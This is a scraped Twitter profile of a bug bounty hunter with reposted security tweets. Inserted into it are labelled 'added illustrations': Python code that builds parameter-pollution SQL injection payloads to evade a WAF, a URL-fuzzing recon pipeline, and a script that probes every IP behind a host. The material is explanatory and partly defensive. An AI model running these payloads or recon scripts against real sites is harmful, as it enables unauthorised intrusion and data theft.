eye 👁️ (@minometidji)'s Twitter Profile
eye 👁️

@minometidji

We have a new day, new opportunities, and new possibilities, so go ahead and learn something.

ID: 1253388933452435457

Joined: 23-04-2020 18:23:16

616 Tweets

1.1K Followers

358 Following

ryuku (@malekmesdour):

Dear bug bounty hunters, I want you to share more about the times when bug bounty programs have ripped you off. We don’t talk about it enough that’s why it keeps happening, and why these bug bounty platforms continue to fail to protect us. #BugBounty #Scam

ryuku (@malekmesdour):

When you’re counting on that one triaged report to pay the rent, and it turns out to be an internal duplicate 💀 #BugBounty

zack0x01 (@zack0x01):

Hey #bugbounty hunters 👋 I wanna share how bug bounty completely changed my life 🧠💻 Two months ago, I moved to France 🇫🇷 , I was at one of the lowest points in my life. The only thing I really knew how to do was hack 😅 so I started a 30-day hacking challenge here on X. All

zack0x01 (@zack0x01):

After you guys asked for an IDOR video, here it is! 🎥 I just dropped it on YouTube. Go check it out and let me know what you think 😉 #BugBounty #BugBountytips #CyberSecurity #InfoSec #infosecurity youtube.com/watch?v=AWBhPa…

H4x0r.DZ (@h4x0r_dz):

Vulnerability I found in Signal: Signal Desktop Path Traversal vulnerability in Attachment Saving medium.com/@h4x0r_dz/sign…

zhero; (@zhero___):


the paper I mentioned earlier is ready + the latest discovery regarding the CVE patch bypass, which was made during its writing has been added; it should be published soon

in the meantime, here's tonight's find, again on a big framework: a bizarre bug, just the way we like them

ryuku (@malekmesdour):


I found an SQLi on the main app and I was able to execute any SQL function. They “fixed” it in two days and downgraded it to High, saying it was “read-only”💀

Anyway, below is how I bypassed the WAF using parameter pollution.

#BugBounty #bugbountytips
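
The bypass itself is in an image that did not survive on this page, so the following is an added illustration of the general mechanism behind parameter-pollution WAF bypasses, not the author's payload: the WAF and the backend collapse a repeated parameter name differently, so the WAF inspects one fragment while the backend reassembles the whole injection. The signature regex, the "first-wins" WAF model, the toy query and both payloads are constructed for this example; the PHP (last occurrence wins) and ASP.NET/IIS (occurrences joined with a comma) behaviours are the well-known ones.

```python
import re
from urllib.parse import parse_qsl

# Toy WAF signature standing in for a real rule set (constructed for this example).
SQLI_SIGNATURE = re.compile(r"(?i)\bunion\b.*\bselect\b|'\s*or\s*'")

# Constructed payloads (not the author's). Each splits the injection across two
# copies of the same parameter name so that no single occurrence matches the rule.
PAYLOAD_LAST_WINS = "id=1&id='+UNION+SELECT+password+FROM+users--"
PAYLOAD_JOIN = "id=1'+UNION/*&id=*/SELECT+1--"


def collapse(pairs, mode):
    """Reduce repeated parameter names the way different stacks do.

    first: keep the first occurrence (the WAF behaviour modelled here)
    last:  keep the last occurrence (PHP's $_GET behaves this way)
    join:  concatenate occurrences with a comma (ASP.NET / IIS behave this way)
    """
    out = {}
    for name, value in pairs:
        if mode == "first":
            out.setdefault(name, value)
        elif mode == "last":
            out[name] = value
        elif mode == "join":
            out[name] = value if name not in out else out[name] + "," + value
        else:
            raise ValueError(f"unknown mode {mode!r}")
    return out


def naive_waf_blocks(query, mode="first"):
    """A WAF that collapses duplicates BEFORE matching only ever sees one fragment."""
    params = collapse(parse_qsl(query, keep_blank_values=True), mode)
    return any(SQLI_SIGNATURE.search(v) for v in params.values())


def strict_waf_blocks(query):
    """Hardened check: every occurrence is matched on its own, and a repeated
    parameter name is rejected outright, so a split payload has nowhere to hide."""
    pairs = parse_qsl(query, keep_blank_values=True)
    names = [name for name, _ in pairs]
    if len(names) != len(set(names)):
        return True
    return any(SQLI_SIGNATURE.search(value) for _, value in pairs)


def backend_sql(query, mode):
    """Deliberately vulnerable backend: string-concatenates the value it ends up with."""
    params = collapse(parse_qsl(query, keep_blank_values=True), mode)
    return f"SELECT name FROM items WHERE id = '{params.get('id', '')}'"


def bypass(query, waf_mode, backend_mode):
    """True when the naive WAF passes the request but the injected tokens reach
    the backend query intact (the signature is re-run on the final SQL text as a
    proxy for 'the injection survived')."""
    if naive_waf_blocks(query, waf_mode):
        return False
    return SQLI_SIGNATURE.search(backend_sql(query, backend_mode)) is not None


if __name__ == "__main__":
    for query, backend in ((PAYLOAD_LAST_WINS, "last"), (PAYLOAD_JOIN, "join")):
        print(query)
        print("  naive WAF (first-wins) blocks:", naive_waf_blocks(query, "first"))
        print("  backend executes:             ", backend_sql(query, backend))
        print("  bypass:                       ", bypass(query, "first", backend))
        print("  strict WAF blocks:            ", strict_waf_blocks(query))
```

The second payload is the comma-join variant: the comma that ASP.NET inserts between the two occurrences lands inside a `/* ... */` comment, so the reassembled statement is valid SQL even though neither fragment on its own contains both `UNION` and `SELECT`. Parameterised queries on the backend remove the injection regardless of how the WAF parses; the strict check above only closes the parsing gap.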

ryuku (@malekmesdour):

Here's my methodology (P.S. I've been terribly lazy lately):
1. I use gau to crawl the target (with API keys)
2. I use grep to filter junk and match the question mark '?'
3. I use uro to get unique URLs
4. I test params one by one
Links to the tools below.
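
As an added, offline-runnable version of steps 2 to 4 (not the author's scripts, and not the real `gau` or `uro` binaries): the sample URL list stands in for `gau` output and is constructed; `signature()` approximates what `uro` does by collapsing URLs that share host, path and parameter names regardless of values; `per_param_variants()` prepares the "one parameter at a time" inputs for step 4. The junk-extension list and the `FUZZ` marker are assumptions.

```python
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Constructed stand-in for `gau` output; not real crawl data.
GAU_OUTPUT = """\
https://example.com/
https://example.com/static/app.js
https://example.com/search?q=shoes
https://example.com/search?q=hats&page=2
https://example.com/search?page=3&q=socks
https://example.com/item?id=17
https://example.com/item?id=42
https://example.com/item.php?id=99&ref=home
https://example.com/logo.png?v=3
"""

# Static assets are junk for parameter testing (assumed list, extend as needed).
JUNK_EXTENSIONS = (".js", ".css", ".png", ".jpg", ".jpeg", ".gif", ".svg",
                   ".woff", ".woff2", ".ico", ".map")


def is_junk(url):
    return urlsplit(url).path.lower().endswith(JUNK_EXTENSIONS)


def signature(url):
    """uro-like key: scheme, host, path and the SET of parameter names.
    Two URLs that differ only in parameter values (or order) share a key."""
    parts = urlsplit(url)
    names = tuple(sorted(name for name, _ in parse_qsl(parts.query, keep_blank_values=True)))
    return parts.scheme, parts.netloc, parts.path, names


def unique_param_urls(raw):
    """Steps 2 and 3: keep URLs that carry a query string, drop static junk,
    and keep one representative per signature (first seen wins)."""
    seen, kept = set(), []
    for line in raw.splitlines():
        url = line.strip()
        if not url or "?" not in url or is_junk(url):
            continue
        key = signature(url)
        if key in seen:
            continue
        seen.add(key)
        kept.append(url)
    return kept


def per_param_variants(url, marker):
    """Step 4 helper: one URL per parameter, with only that parameter's value
    replaced by marker, so each injection point is exercised in isolation."""
    parts = urlsplit(url)
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    variants = []
    for i in range(len(pairs)):
        mutated = [(n, marker if j == i else v) for j, (n, v) in enumerate(pairs)]
        variants.append(urlunsplit(parts._replace(query=urlencode(mutated))))
    return variants


if __name__ == "__main__":
    for url in unique_param_urls(GAU_OUTPUT):
        for variant in per_param_variants(url, "FUZZ"):
            print(variant)
```

Feed the printed variants to whatever you test with; the point of the signature step is that `item?id=17` and `item?id=42` are the same injection point and only need one request each per payload.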

eye 👁️ (@minometidji):

$1,500 bounty on HackerOne! The maximum severity for DOM XSS and Reflected XSS is Medium in their policy. But if ryuku uses his magic, the bonus will come ;) hackerone.com/eye_ #TogetherWeHitHarder

zhero; (@zhero___):


We unfortunately won’t be able to publish our latest paper before the end of 2025 as the maintainers chose to delay it until early January.

Still, it’s been a productive year of zero-day discoveries, with a focus on frameworks, many of which were shared on the blog.

2025 Recap:

zhero; (@zhero___):


honored to see two of my research works selected for the initial nominations.

they've been the most fruitful for me in practice, with ongoing discoveries of vuln assets, incl. several major platforms, and six figures in rewards.

If they helped you in any way, consider voting - 14/01

ProjectDiscovery (@pdiscoveryio):


Stop missing attack surface behind Round Robin DNS. 🛑

By default, tools often check just one IP. Force httpx to enumerate ALL resolved A records for every subdomain using -probe-all-ips.

Use this Command👇

httpx -l live_hosts.txt -probe-all-ips -silent -o multi_ip_hosts.txt
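
As an added example of what `-probe-all-ips` does, written here and not taken from httpx's own code: resolve every A record for a name, then open a connection to each address individually while still sending the hostname as SNI and `Host`, so a backend that is only reachable through one member of the round-robin set answers as it would to a real client. `probe_targets()` takes an injectable resolver so the expansion can be checked offline; the `FAKE_DNS` map uses documentation addresses and is constructed, and `live_hosts.txt` is assumed to be one hostname per line.

```python
import http.client
import socket
import ssl
import sys


def resolve_all_ipv4(host):
    """Every A record for host, deduplicated and sorted (the -probe-all-ips idea)."""
    infos = socket.getaddrinfo(host, None, family=socket.AF_INET,
                               type=socket.SOCK_STREAM)
    return sorted({info[4][0] for info in infos})


def probe_targets(hosts, resolver=resolve_all_ipv4, all_ips=True):
    """Expand hostnames into (host, ip) pairs.

    all_ips=False reproduces the single-IP default the tweet warns about:
    only the first address of a round-robin name ever gets probed.
    """
    targets = []
    for host in hosts:
        ips = resolver(host)
        for ip in (ips if all_ips else ips[:1]):
            targets.append((host, ip))
    return targets


def probe(host, ip, port=443, tls=True, timeout=5.0):
    """Open the TCP connection to one specific IP, but send the hostname as SNI
    and Host so the server (or the balancer in front of it) routes the request
    exactly as it would for a normal client resolving the name."""
    sock = socket.create_connection((ip, port), timeout=timeout)
    if tls:
        # Certificate is verified against the hostname, not the IP; a mismatch
        # raises and is itself worth noting for that address.
        sock = ssl.create_default_context().wrap_socket(sock, server_hostname=host)
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    conn.sock = sock  # reuse the pre-connected socket instead of resolving host again
    conn.request("GET", "/", headers={"Host": host, "User-Agent": "probe-all-ips-example"})
    resp = conn.getresponse()
    body = resp.read(4096)
    conn.close()
    return resp.status, resp.getheader("Server", ""), len(body)


# Constructed resolution map for offline use (RFC 5737 documentation ranges).
FAKE_DNS = {
    "multi.example": ["203.0.113.10", "203.0.113.11", "203.0.113.12"],
    "single.example": ["198.51.100.5"],
}


if __name__ == "__main__":
    # Usage: python probe_all_ips.py live_hosts.txt
    hosts = [h.strip() for h in open(sys.argv[1]) if h.strip()]
    for host, ip in probe_targets(hosts):
        try:
            status, server, size = probe(host, ip)
            print(f"{host} @ {ip}: {status} server={server!r} bytes={size}")
        except (OSError, http.client.HTTPException) as exc:
            print(f"{host} @ {ip}: error {exc}")
```

Differences in status, `Server` header or body size between addresses of the same name are the signal: they usually mean a stale or differently configured origin sitting behind one member of the DNS set, which a single-IP probe never touches.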